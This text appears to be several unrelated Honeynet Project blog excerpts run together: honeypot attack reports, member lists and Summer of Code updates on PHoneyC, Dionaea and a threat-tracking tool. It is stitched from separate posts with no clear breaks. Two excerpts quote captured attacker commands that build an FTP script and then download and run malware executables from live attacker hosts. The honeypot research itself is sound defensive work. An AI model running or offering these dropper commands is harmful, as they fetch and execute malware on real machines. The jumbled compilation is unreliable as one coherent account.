Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec(“cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”)
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename. But, as the ftp service embedded in the malware is still special, it was a problem.
The ftp service is designed to work with the windows ftp client, the windows ftp only provides active ftp, active ftp does not work on nat if the ftp service port is not on default port 21. Apart from that, the ftp service may fail with 6% of all ports.

ORGANIZATION

The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to inform the community. Our current members are:

• Diego González, chapter lead, Telecommunications Engineer and IT Security Professional.
• Javier Fernández-Sanguino Peña, PhD in Telecommunications Engineering and project leader in Germinus XXI S.A.
• Raúl Siles, Masters degree in Computer Science, GSE and senior independent Security Consultant.
• Carlos Fragoso Mariscal, networking, systems and security engineer for Supercomputing Center of Catalonia.

Our chapter has a new member, Pedro Sánchez, security administrator of “Asociación Técnica de Cajas de Ahorros”, CISM and CHFI.

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the major future works. One of my goals for the Google Summer of Code time is to improve the parser and to reduce upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism on first sight, they use(d) a domain.

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to avoid is simply making graphs/charts and that sort of visualization.  Those sorts of things are incredibly useful since anyone can understand them, on the other hand they’re trivial to make.  I’ve been making a few basic visualizations, but the two that, so far, have the most merit are delinating the events based on color (each group of events is a separate color) and the other separates them based on height (each y position is a different event).  I’ll admit that these are very rudimentary, but I think they get the idea across.  Each attached picture is broken into two visualizations, the top is based on color, the bottom on position.  One picture also experiments with size, basically if there are similar groups near one event, that node on the graph gets wider.  It’s pretty basic at the moment, if there is a match for a group in the current event, and the one ahead of it, than it gets wider.  Since I only have one data source on my test data (one IP address) there’s only one band, but with more data sources, more bands would appear, so one could compare and contrast data between different machines.  Grey nodes in both graphs are any data that doesn’t match a group, basically I was trying to pick a neutral color that doesn’t pop out when a user looks at the graph.  Ungrouped data isn’t particularly interesting, aside from trying to see if an abscene of something indicates a trend.

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our program can handle normal web pages. We will not list them here.

Our code can be found at:

http://code.google.com/p/phoneyc/source/browse/phoneyc#phoneyc/branches/phoneyc_wanggeng

1. DOM tree generation.

We defined a class ‘DOMObject’ in python, it has a list ‘children’ as its member. We use SGMLParser to parse the html document and create a DOMObject when met a start tag. And the DOM tree can be output for further analysis.

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

What we basically want to achieve is having a stable base for registering certain known-to-be vulnerable RPC calls in modules to detect exploits and thus be able to collect malware. This way one can easily write a new module if a new patch or exploit gets released for yet another vulnerability without going through the hassle of implementing all SMB message types in each module. In the past we had to manually implement each one in a C++ module for the nepenthes honeypot.

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind’s GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind’s server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain. The database format is actually quite simple, and he managed to create a valid database that places the whole Internet around Kiev.

Mid-term Report on PHoneyC GSoC project 1

Introduction

PHoneyC is a low-interaction honeyclient written by Jose Nazario. The
shellcode (SC for short) and heapspray (HS for short) detection module
for PHoneyC is listed on the GSoC this year and I feel lucky to be
chosen to implement it. This report is the main idea about how to
detect SC/HS in PHoneyC and how to build and run this version of
PHoneyC. Note that this module (I call it honeyjs) is far from
complete currently and this report is only for midterm evaluation. So
it is possible that the way to build and run it won’t work in the
future.

What is TIP? TIP stands for Tracking Intelligence Project. In my most beautiful dreams, TIP should be an information gathering
framework whose purpose is to autonomously collect Internet threat
trends. It’s entirely written in Python using Twisted and bound to the Django framework in order to abstract the underlying database and to easily build a web interface to the data.

TIP is made up of a few modules which are totally independent one from the other but with each one feeding the other ones. Its design is based on a core module which acts as a kind of scheduler which schedules what we can call “first level modules” at a precise time in future or in response to a particular event.